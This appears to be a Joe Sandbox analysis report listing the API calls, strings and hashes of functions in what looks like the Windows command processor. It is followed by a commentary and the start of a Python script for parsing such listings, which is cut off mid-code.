  • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00EE85BC
  • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00EE8614
  • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00EE8653
  • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00F1C9D0,00000008), ref: 00EE867D
  • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00F1C970,00000020), ref: 00EE8698
  • Part of subcall function 00EE8572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00F1C930,00000020), ref: 00EE86B0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00EE89CD
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE89D4
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 00EE89E9
                                                                                                                                                                                                                                                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00EE8A23
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00EE8A2A
                                                                                                                                                                                                                                                                                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00EE8AB5
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00EE8AC0
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00EE8AD1
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00EE8AE7
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00EE8AF8
                                                                                                                                                                                                                                                                                                                                                      • free.MSVCRT(?), ref: 00EE8B18
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                                                                                                                                                                                                                                                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3313898297-3021193919
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6627f93c69d8e61b97100ac6bc1ef889ab94ac77e1d463ddfa93eac5d0ef80d4
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ec5096b2b8faa6c3421d61dbb44c10121b23ddf9a18e1c9988f0f568e4cbbdbf
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6627f93c69d8e61b97100ac6bc1ef889ab94ac77e1d463ddfa93eac5d0ef80d4
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56910A71A0038C9BDB24EBB69D5AA7A37A5EF84744B045019F50AE71A2DF718C42EB12

Control-flow Graph
APIs
• RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00EE82D3
• RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00EE8313
• RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00EE834D
• RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00EE839D
• RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 00EE83D7
• RegQueryValueExW.KERNELBASE(?,CompletionChar,00000000,00000001,?,00001000), ref: 00EE8427
• RegQueryValueExW.KERNELBASE(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00EE8498
• RegQueryValueExW.KERNELBASE(?,AutoRun,00000000,00000004,?,00001000), ref: 00EE8526
• RegCloseKey.KERNELBASE(?), ref: 00EE853A
• time.MSVCRT(00000000), ref: 00EE8554
• srand.MSVCRT ref: 00EE855B
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor$p~]u
• API String ID: 145004033-72510396
• Opcode ID: 66ddf30fb29840160c8d349701b82eb78b9592e7ef09a4b41dfe13c5867e247f
• Instruction ID: a590f1952d9a395405b0e2d69eff09b70951936c219d18d895e7a20fae1fb5bc
• Opcode Fuzzy Hash: 66ddf30fb29840160c8d349701b82eb78b9592e7ef09a4b41dfe13c5867e247f
• Instruction Fuzzy Hash: DEC16E3590029DDAEB328B51DD04BE9B7B8FB08706F1090E6E689F2190DBB05EC5DF65

Control-flow Graph
APIs
• GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00EF09CB
• OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00EF09D8
  • Part of subcall function 00EEE2AF: SetThreadUILanguage.KERNELBASE ref: 00EEE2C6
• HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00EF09ED
• RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00EF0A0A
• _setjmp3.MSVCRT ref: 00EF0A72
• GetConsoleOutputCP.KERNELBASE ref: 00EF0AA3
• GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EF0AB4
• exit.KERNELBASE ref: 00EF0ADA
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00EFE9E1
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00EFE9EA
  • Part of subcall function 00EF1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00EFEF7C,?,00000000,00000000), ref: 00EF1FB2
  • Part of subcall function 00EF1F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00EFEF7C,?,00000000,00000000), ref: 00EF1FCE
  • Part of subcall function 00EF1F1A: GetConsoleOutputCP.KERNELBASE(00EF0A41), ref: 00EF1F1A
  • Part of subcall function 00EF1F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00F1C9F0), ref: 00EF1F2B
  • Part of subcall function 00EF1F1A: memset.MSVCRT ref: 00EF1F45
  • Part of subcall function 00EE87CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00F1CA04), ref: 00EE87EE
  • Part of subcall function 00EE87CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE87FA
  • Part of subcall function 00EE87CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00EE880E
  • Part of subcall function 00EE87CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00F07460,00000001), ref: 00EE881B
  • Part of subcall function 00EE87CA: _get_osfhandle.MSVCRT ref: 00EE8828
  • Part of subcall function 00EE87CA: GetConsoleMode.KERNELBASE(00000000), ref: 00EE8830
  • Part of subcall function 00EE87CA: _get_osfhandle.MSVCRT ref: 00EE883C
  • Part of subcall function 00EE87CA: GetConsoleMode.KERNELBASE(00000000), ref: 00EE8844
  • Part of subcall function 00EE87CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE886A
  • Part of subcall function 00EE87CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00EE88A5
• _setjmp3.MSVCRT ref: 00EFEA5E
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
• String ID: DisableCMD$Software\Policies\Microsoft\Windows\System$p~]u
• API String ID: 4238206819-4263504856
• Opcode ID: 122d1bd3aff6c2438c2fd6eeef7159fef960f4a11a5c3bbead82b2cf4e8bc466
• Instruction ID: 0b88d9961b1d58ece19d2d2b6359885bbfd668f9e58888018895a6fdb7e1377a
• Opcode Fuzzy Hash: 122d1bd3aff6c2438c2fd6eeef7159fef960f4a11a5c3bbead82b2cf4e8bc466
• Instruction Fuzzy Hash: 8B71D77160070DEFEB21AF719C469BE7AE9FF04344B146429F702F12A2EB35D841AB61

Control-flow Graph of the function at 00EF00E9 (rendered graph omitted; legend: Executed / Not Executed; basic blocks 00EF00E9 through 00EFE734, API calls listed below)
APIs
• memset.MSVCRT ref: 00EF011A
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00EF0156
  • Part of subcall function 00EEEC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00F0E590,00002000,?,00F28BF0,00000000,?,?,00EE8F0D), ref: 00EEEC51
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEEC77
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEEC8D
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECA3
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECB9
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECCF
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECE5
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEECF7
  • Part of subcall function 00EEEC2E: _wcsicmp.MSVCRT ref: 00EEED0D
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EF01DB
• exit.MSVCRT ref: 00EFE621
• _wcsupr.MSVCRT ref: 00EFE683
• _wcsicmp.MSVCRT ref: 00EFE71A
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
• String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
• API String ID: 2336066422-4197029667
• Opcode ID: aa00f22d25eb973634231fa5679a45115e05bd7a12f5f4c4124479703c86915d
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 4e8a1ab7c5346d35a7bd169f14e2d6087d59985fe1f91e108acec8f5de77c5c8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa00f22d25eb973634231fa5679a45115e05bd7a12f5f4c4124479703c86915d
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C651E930B0025E4BDF28DB628C555BE73A59FA4308F15646DEA06F7391EF70EE418791

Control-flow Graph (legend: Executed / Not Executed; graph rendering not reproduced here)
APIs
• Part of subcall function 00EF5A2E: memset.MSVCRT ref: 00EF5A5A
• Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000,?,00000104,?), ref: 00EE8C7A
• towupper.MSVCRT ref: 00EE8C8F
• iswalpha.MSVCRT ref: 00EE8CA4
• towupper.MSVCRT ref: 00EE8CC4
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00EE8CF0
• GetFileAttributesW.KERNELBASE(?), ref: 00EE8D93
• GetFileAttributesW.KERNELBASE(?), ref: 00EE8DE0
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00EE8E11
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EFB6AB
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
• String ID:
• API String ID: 1133067188-0
• Opcode ID: 5af1963b6beba125b591cb62de64d514abbc53497e6c102ea88ee0457c76edb2
• Instruction ID: 65c95aaeaffa12d3e8da4fbe2c479de2c184f1c85a7672907f9892e00a035f23
• Opcode Fuzzy Hash: 5af1963b6beba125b591cb62de64d514abbc53497e6c102ea88ee0457c76edb2
• Instruction Fuzzy Hash: 20B1BD31A0015D8BDB28EB65DE45AFDB3B4EF14304F2562A9E51AF31A0EB309E80DA51

Control-flow Graph (legend: Executed / Not Executed; graph rendering not reproduced here)
APIs
• _get_osfhandle.MSVCRT ref: 00EEE318
• SetConsoleMode.KERNELBASE(00000000), ref: 00EEE322
• _get_osfhandle.MSVCRT ref: 00EEE32F
• GetConsoleMode.KERNELBASE(00000000), ref: 00EEE339
• _get_osfhandle.MSVCRT ref: 00EEE35E
• GetConsoleMode.KERNELBASE(00000000), ref: 00EEE368
• _get_osfhandle.MSVCRT ref: 00EEE390
• SetConsoleMode.KERNELBASE(00000000), ref: 00EEE39A
• _get_osfhandle.MSVCRT ref: 00EEE3C7
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EEE3D1
• _get_osfhandle.MSVCRT ref: 00EFDC35
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EFDC3F
Strings
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID: CMD.EXE
• API String ID: 1606018815-3025314500
• Opcode ID: 7d26d81b5814d83912faa375838c474749798346bd4e1140dbca70e4f7d43472
• Instruction ID: d486c28a402f3203e02d05bacab0b6ec8d0424d74afb717d0797dffcc7588304
• Opcode Fuzzy Hash: 7d26d81b5814d83912faa375838c474749798346bd4e1140dbca70e4f7d43472
• Instruction Fuzzy Hash: D721B3B0A0060C9FD7249B74EC5EB9A3626BB00719B088428F507E73B0D7B6D925BF53

Control-flow Graph (interactive graph not reproduced)
APIs
• memset.MSVCRT ref: 00EE5A10
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00EE5A53
• CreateDirectoryW.KERNELBASE(?,00000000), ref: 00EE5A70
• ??_V@YAXPAX@Z.MSVCRT(?), ref: 00EE5A87
  • Part of subcall function 00EF0B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00EF0B40
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE5AA1
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00EE5B09
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EE5B13
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00EE5B70
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00EF9B7C
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
• String ID:
• API String ID: 402963468-0
• Opcode ID: 958997b791a26ecaf0c11caff48bd6693dbefebcc8f212e15548cc86a488dd06
• Instruction ID: bf702e9c7b6239d3241400efdbdbd30dd97fcf0cbaaa646faa630c8483400ba2
• Opcode Fuzzy Hash: 958997b791a26ecaf0c11caff48bd6693dbefebcc8f212e15548cc86a488dd06
• Instruction Fuzzy Hash: 7991E632A00A5E9BDB34DB669C85BBBB7B4EF88318F1450A9E649F7181F7708D81C750

Control-flow Graph (interactive graph not reproduced)
APIs
• Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00F0CA98,0000000C), ref: 00EF6940
• _amsg_exit.MSVCRT ref: 00EF6955
• _initterm.MSVCRT ref: 00EF69A9
• __IsNonwritableInCurrentImage.LIBCMT ref: 00EF69D5
• exit.MSVCRT ref: 00EF6A1C
• _XcptFilter.MSVCRT ref: 00EF6A2E
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
• String ID:
• API String ID: 796493780-0
• Opcode ID: 56a281aa935c03a75eb07e56057fe9c1aff2b87066ad5a7cc46c5f8f3e7ae57f
• Instruction ID: e367e8b1bc96a365e5e42e2133e9b2144aa6221a93e35d2919b227222abe708b
• Opcode Fuzzy Hash: 56a281aa935c03a75eb07e56057fe9c1aff2b87066ad5a7cc46c5f8f3e7ae57f
• Instruction Fuzzy Hash: 8331C57164431DCFEB259B64ED4563977A0FB89738F24292DE606F72E0EBB09840EB41

Control-flow Graph (interactive graph not reproduced)
APIs
• SetThreadUILanguage.KERNELBASE ref: 00EEE2C6
• GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,00000000,00EEB952), ref: 00EEE2D9
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(774B0000,SetThreadUILanguage,00000000,00EEB952), ref: 00EEE2F9
• SetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000409,00000000,00EEB952), ref: 00EFDC08
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Thread$AddressHandleLanguageLocaleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1264603166-2530943252
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d3e795a54c3e4e2d21eead892c8e352502a5400c38497c8b684cca57cab8a170
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 659263e8c08014881811c0759fd2e2d17c209076611a4fcb8c0dc9a288b4eae8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3e795a54c3e4e2d21eead892c8e352502a5400c38497c8b684cca57cab8a170
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0B43190126C8BC6216F35BD0D6993658EB08B34B055201FA15F33F4CBB09C42EA91

Control-flow Graph
(rendered as an image in the original report) Entry block eead60 calls GetConsoleTitleW; block eeb0dc calls towupper, eeaecb calls wcschr and eeb00e calls wcsncmp; the error branches at efcc6a and efccc9 call GetLastError.
APIs
• GetConsoleTitleW.KERNELBASE(?,00000104,55099697,00000001,?), ref: 00EEADB6
  • Part of subcall function 00EF5A2E: memset.MSVCRT ref: 00EF5A5A
  • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
• towupper.MSVCRT ref: 00EEB0E3
  • Part of subcall function 00EEE950: memset.MSVCRT ref: 00EEE9A0
  • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEE9FC
  • Part of subcall function 00EEE950: wcschr.MSVCRT ref: 00EEEA14
  • Part of subcall function 00EEE950: _wcsicmp.MSVCRT ref: 00EEEA80
• wcschr.MSVCRT ref: 00EEAED2
• wcsncmp.MSVCRT ref: 00EEB016
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
  • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
  • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 00EFCC6C
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00EFCCCB
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
• String ID:
• API String ID: 4198873954-0
• Opcode ID: a1e8ebb30f4993bbb34a4c2e730ef50329482f28cc8839acb8c6ee93126b3980
• Instruction ID: e67646bbc2cc38c5ce75eea0855be6621245ac1f3e5f5624b48084fa72a2420e
• Opcode Fuzzy Hash: a1e8ebb30f4993bbb34a4c2e730ef50329482f28cc8839acb8c6ee93126b3980
• Instruction Fuzzy Hash: ADB16E71A0029D87CB34AB26CD957BA73A1EF40304F28617DDA1EB72D1EB30AD85C756
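The two API listings above are the raw material an analyst pivots on: the first shows the sequence GetModuleHandleW(KERNEL32.DLL), GetProcAddress(SetThreadUILanguage), SetThreadLocale(0x0409), where 0x0409 is the en-US LCID and the GetProcAddress call resolves one export by name (a pattern legitimate binaries also use to tolerate missing exports on older Windows, so a single resolution is weak evidence by itself; the value is in the list of names). The second is a string-parsing routine whose "Part of subcall function" entries are counted into the report's API ID. The following script is an added example, not part of the Joe Sandbox report: it parses bullets in exactly the form printed on this page into records, pairs each GetProcAddress with the preceding module handle, and reconstructs the API ID. The API ID rule (CamelCase words of every API name including subcalls and names passed to GetProcAddress, minus Get/Set prefixes and all-caps tokens, grouped by descending frequency, each group sorted in code-point order, groups joined with "$") is an assumption inferred from the values on this page, not Joe Sandbox's documented algorithm. The sample listings are copied from the two functions above.

```python
# Added example (not part of the Joe Sandbox report): parse per-function "APIs" bullets,
# recover dynamically resolved imports, and reconstruct the report's "API ID".
# The API-ID rule is an assumption inferred from this page's values, not a documented format.
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple

# "• Api.MODULE(args), ref: ADDR"  or  "• Part of subcall function ADDR: Api.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Za-z0-9\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# CamelCase splitter: "GetConsoleTitleW" -> Get, Console, Title, W; "_wcsicmp" stays whole.
WORD = re.compile(r"[A-Z][a-z]+|[A-Z]+(?![a-z])|[a-z_]+")

# Copied from the two API listings on this page (call sites inside the 0x00EE0000 image).
LOADER_FUNC = """
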